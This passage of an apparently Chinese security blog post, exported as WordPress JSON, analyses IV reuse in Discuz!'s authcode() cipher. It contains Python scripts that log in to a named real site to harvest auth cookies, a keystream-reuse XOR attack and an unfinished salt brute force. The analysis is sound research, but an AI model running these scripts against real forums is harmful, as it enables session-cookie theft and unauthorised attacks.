{&#8216;username&#8217;:&#8217;\u8bf7\u66ff\u6362username2&#8242;,&#8217;password&#8217;:&#8217;\u8bf7\u66ff\u6362pass2&#8242;,&#8217;quickforward&#8217;:&#8217;yes&#8217;,&#8217;handlekey&#8217;:&#8217;ls&#8217;}<\/p>\n<p>data = urllib.urlencode(data)<\/p>\n<p>&nbsp;<\/p>\n<p>conn = httplib.HTTPConnection(&#8220;photo003.com&#8221;)<\/p>\n<p>conn.request(&#8216;POST&#8217;,<\/p>\n<p>&#8216;\/member.php?mod=logging&amp;action=login&amp;loginsubmit=yes&amp;infloat=yes&amp;lssubmit=yes&amp;inajax=1&#8217;,<\/p>\n<p>data,<\/p>\n<p>headers)<\/p>\n<p>&nbsp;<\/p>\n<p>res = conn.getresponse()<\/p>\n<p>&nbsp;<\/p>\n<p>if res:<\/p>\n<p>cookies = Cookie.SimpleCookie()<\/p>\n<p>cookies.load(res.getheader(&#8220;Set-Cookie&#8221;))<\/p>\n<p>&nbsp;<\/p>\n<p>authcookie = urllib.unquote(cookies[&#8220;79uz_d57e_auth&#8221;].value)<\/p>\n<p>iv = authcookie[0:4]<\/p>\n<p>cipher = base64.b64decode(authcookie[4:])<\/p>\n<p>c.execute(&#8216;INSERT INTO\u00a0<strong>photo003_2630<\/strong>(iv, cipher) VALUES (?, ?)&#8217;,(iv, cipher))<\/p>\n<p>&nbsp;<\/p>\n<p>dbcon.commit()<\/p>\n<p>print str(i) + &#8216; \u00a0 &#8216; + iv<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>======================================================================<\/p>\n<p>&nbsp;<\/p>\n<p>crack_discuz_authcode.py\uff1a<\/p>\n<p>======================================================================<\/p>\n<p>&nbsp;<\/p>\n<p>import string<\/p>\n<p>import urllib2<\/p>\n<p>import urllib<\/p>\n<p>#from urlparse import urlparse<\/p>\n<p>import httplib<\/p>\n<p>import Cookie<\/p>\n<p>import sqlite3<\/p>\n<p>import base64<\/p>\n<p>import operator<\/p>\n<p>import md5<\/p>\n<p>import random<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>def crack(plain1, cipher1, cipher2):<\/p>\n<p>plain2 = &#8221;<\/p>\n<p>for i in range(0,len(plain1)):<\/p>\n<p>ch = operator.xor(ord(plain1[i]), ord(cipher1[i]))<\/p>\n<p>plain2 += chr(operator.xor(ch, ord(cipher2[i])))<\/p>\n<p>return plain2<\/p>\n<p>&nbsp;<\/p>\n<p>def bytecode(st):<\/p>\n<p>s = &#8221;<\/p>\n<p>for c in st:<\/p>\n<p>s = s + str(ord(c)) + &#8216;,&#8217;<\/p>\n<p>return s<\/p>\n<p>&nbsp;<\/p>\n<p>def list_iv_collision():<\/p>\n<p>dbcon = sqlite3.connect(&#8216;.\/authcode.db&#8217;)<\/p>\n<p>c = dbcon.cursor()<\/p>\n<p>&nbsp;<\/p>\n<p>dbcon.text_factory = str<\/p>\n<p>&nbsp;<\/p>\n<p>c.execute(&#8216;select * from photo003_2626&#8217;)<\/p>\n<p>r1 = c.fetchall()<\/p>\n<p>&nbsp;<\/p>\n<p>c.execute(&#8216;select * from photo003_2630&#8217;)<\/p>\n<p>r2 = c.fetchall()<\/p>\n<p>if r1 and r2:<\/p>\n<p>for c1 in r1:<\/p>\n<p>for c2 in r2:<\/p>\n<p>if c1[1] == c2[1]:<\/p>\n<p>print c1[1] + &#8216; \u00a0 &#8216; + c2[1]<\/p>\n<p>c.close()<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>dbcon = sqlite3.connect(&#8216;.\/authcode.db&#8217;)<\/p>\n<p>c = dbcon.cursor()<\/p>\n<p>&nbsp;<\/p>\n<p>dbcon.text_factory = str<\/p>\n<p>&nbsp;<\/p>\n<p>list_iv_collision()<\/p>\n<p>&nbsp;<\/p>\n<p>###################################<\/p>\n<p># \u00a0\u4e0b\u9762\u7684\u4ee3\u7801\u5c1d\u8bd5\u7834\u89e3salt\uff0c\u6b64\u529f\u80fd\u5c1a\u672a\u5b8c\u6210<\/p>\n<p>###################################<\/p>\n<p>iv = &#8220;dee5&#8221;<\/p>\n<p>pwd = &#8220;password&#8221;<\/p>\n<p>&nbsp;<\/p>\n<p>c.execute(&#8216;select * from photo003_2626 where iv=?&#8217;, (iv,))<\/p>\n<p>r1 = c.fetchone()<\/p>\n<p>&nbsp;<\/p>\n<p>c.execute(&#8216;select * from photo003_2630 where iv=?&#8217;, (iv,))<\/p>\n<p>r2 = c.fetchone()<\/p>\n<p>&nbsp;<\/p>\n<p>if r1 and r2:<\/p>\n<p>for x in range(0,99999999):<\/p>\n<p>csets = &#8220;abcdefghijklmnopqrstuvwxyz0123456789&#8243;<\/p>\n<p>salt = &#8221;<\/p>\n<p>for i in range(0,6):<\/p>\n<p>salt += random.choice(csets)<\/p>\n<p>plain1 = md5.new(md5.new(pwd).hexdigest() + salt).hexdigest() + &#8216;\\t&#8217; + &#8216;2626&#8217;<\/p>\n<p>#print salt<\/p>\n<p>#print plain1<\/p>\n<p>plain2 = crack(plain1, r1[2][26:], r2[2][26:] )<\/p>\n<p>#print plain2<\/p>\n<p>if plain1[0:32] == plain2[0:32]:<\/p>\n<p>print salt<\/p>\n<p>print &#8216;counter is:&#8217; + str(x)<\/p>\n<p>break<\/p>\n<p>if x%100000 == 0:<\/p>\n<p>print str(x) + &#8216; \u00a0 \u00a0&#8216; + salt<\/p>\n<p>&nbsp;<\/p>\n<p>c.close()<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>======================================================================<\/p>\n<p>&nbsp;<\/p>\n<p>\u6d4b\u8bd5\u6548\u679c\uff1a<\/p>\n<p><a href=\"http:\/\/notes.zerobox.org\/wp-content\/uploads\/2011\/11\/61.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-462\" title=\"6\" src=\"http:\/\/notes.zerobox.org\/wp-content\/uploads\/2011\/11\/61.png\" alt=\"\" width=\"810\" height=\"518\" srcset=\"http:\/\/zerobox.org\/notes\/wp-content\/uploads\/2011\/11\/61.png 810w, http:\/\/zerobox.org\/notes\/wp-content\/uploads\/2011\/11\/61-300x191.png 300w\" sizes=\"auto, (max-width: 810px) 100vw, 810px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>\u5728\u5341\u51e0\u5206\u949f\u5185\u5c31\u80fd\u6536\u96c6\u5230\u5f88\u591a\u91cd\u590d\u7684IV\u3002<\/p>\n<p>&nbsp;<\/p>\n<p>\u901a\u8fc7\u8fd9\u6837\u7684\u65b9\u6cd5\u8fd8\u80fd\u591f\u7834\u89e3salt\uff0c\u4f46\u7531\u4e8e\u65f6\u95f4\u5173\u7cfb\uff0c\u6211\u6ca1\u6709\u7ee7\u7eed\u5b8c\u6210\u6b64\u6bb5\u4ee3\u7801\u4e86\uff0c\u6709\u5174\u8da3\u7684\u8bfb\u8005\u53ef\u4ee5\u7ee7\u7eed\u7814\u7a76\u4e0b\u53bb\u3002<\/p>\n<p>&nbsp;<\/p>\n<p>authcode()\u51fd\u6570\u7531\u4e8e\u6709HMAC\u7684\u5b58\u5728\u56e0\u6b64\u65e0\u6cd5\u4f2a\u9020\u51fa\u4efb\u610f\u660e\u6587\u7684\u5bc6\u6587\u3002\u8fd9\u662f\u56e0\u4e3aHMAC\u7684\u751f\u6210\u4e0e\u670d\u52a1\u7aef\u5bc6\u94a5\u6709\u5173\uff0c\u5728\u672a\u77e5\u5bc6\u94a5\u7684\u60c5\u51b5\u4e0b\uff0c\u662f\u65e0\u6cd5\u6784\u9020\u51fa\u5408\u6cd5\u7684HMAC\u7684\u3002<\/p>\n<p><a href=\"http:\/\/notes.zerobox.org\/wp-content\/uploads\/2011\/11\/71.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-463\" title=\"7\" src=\"http:\/\/notes.zerobox.org\/wp-content\/uploads\/2011\/11\/71.png\" alt=\"\" width=\"578\" height=\"165\" srcset=\"http:\/\/zerobox.org\/notes\/wp-content\/uploads\/2011\/11\/71.png 578w, http:\/\/zerobox.org\/notes\/wp-content\/uploads\/2011\/11\/71-300x85.png 300w\" sizes=\"auto, (max-width: 578px) 100vw, 578px\" \/><\/a><\/p>\n<p>\u6700\u540e\uff0c\u6211\u60f3\u8bf4\u7684\u662f\uff0c\u8fd9\u4e9b\u653b\u51fb\u6700\u540e\u80fd\u4ea7\u751f\u4ec0\u4e48\u6837\u7684\u540e\u679c\uff0c\u662f\u8981\u770b\u5e94\u7528\u4f7f\u7528\u8be5\u52a0\u5bc6\u7b97\u6cd5\u505a\u4e86\u4ec0\u4e48\u4e8b\u60c5\u3002\u5728phpwind\u4e2d\uff0c\u6211\u627e\u5230\u4e86\u9a8c\u8bc1\u7801\u7684\u4e00\u4e2a\u7f3a\u9677\u3002\u4f46\u7531\u4e8e\u65f6\u95f4\u5173\u7cfb\uff0c\u6211\u5e76\u672a\u53bb\u5bfb\u627e\u66f4\u591a\u6709\u5229\u7528\u4ef7\u503c\u7684\u5730\u65b9\u3002<\/p>\n<p>&nbsp;<\/p>\n<p>\u8fd9\u4e9b\u653b\u51fb\u90fd\u662f\u5728\u201c\u4e0d\u77e5\u9053\u5bc6\u94a5\u201d\u7684\u60c5\u51b5\u4e0b\u5b9e\u65bd\u7684\u653b\u51fb\u3002\u800c\u6e17\u900f\u7684\u8fc7\u7a0b\u662f\u590d\u6742\u7684\uff0c\u6709\u65f6\u5019\u901a\u8fc7\u6ce8\u5165\u3001\u6587\u4ef6\u5305\u542b\u7b49\u65b9\u5f0f\u80fd\u591f\u83b7\u53d6\u5230\u5bc6\u94a5\uff0c\u5c31\u53ef\u80fd\u4f1a\u884d\u751f\u51fa\u53e6\u5916\u4e00\u4e9b\u98ce\u9669\u3002\u6bd4\u5982\u77e5\u9053\u5bc6\u94a5\u540e\uff0c\u53ef\u4ee5\u6784\u9020\u51fa\u5408\u6cd5\u7684\u65f6\u95f4\u6233\u548cHMAC\uff0c\u4ece\u800c\u5b8c\u6210bit-flipping\u653b\u51fb\uff0c\u4f7f\u5f97\u4e00\u4e2a\u672c\u6765\u5931\u6548\u7684cookie\u518d\u6b21\u6709\u6548\uff08\u5047\u8bbeautchode\u4e0d\u518d\u8ba4\u4e3a0000000000\u7684\u65f6\u95f4\u662f\u5408\u6cd5\u7684\uff09\u3002\u8fd9\u4e9b\u90fd\u9700\u8981\u53d1\u6325\u5b89\u5168\u7814\u7a76\u8005\u7684\u60f3\u8c61\u529b\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Discuz!\u7684authcode()\u51fd\u6570\u662f\u4e00\u4e2a\u7ecf\u5178\u7684\u6d41\u5bc6\u7801\u7b97\u6cd5\u5b9e\u73b0\uff0cdiscuz &hellip;<\/p>\n<p class=\"read-more\"><a href=\"http:\/\/zerobox.org\/notes\/456.html\">\u7ee7\u7eed\u9605\u8bfb &raquo;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[26],"class_list":["post-456","post","type-post","status-publish","format-standard","hentry","tag-discuz"],"views":1027,"_links":{"self":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/456","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/comments?post=456"}],"version-history":[{"count":0,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/456\/revisions"}],"wp:attachment":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/media?parent=456"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/categories?post=456"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/tags?post=456"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}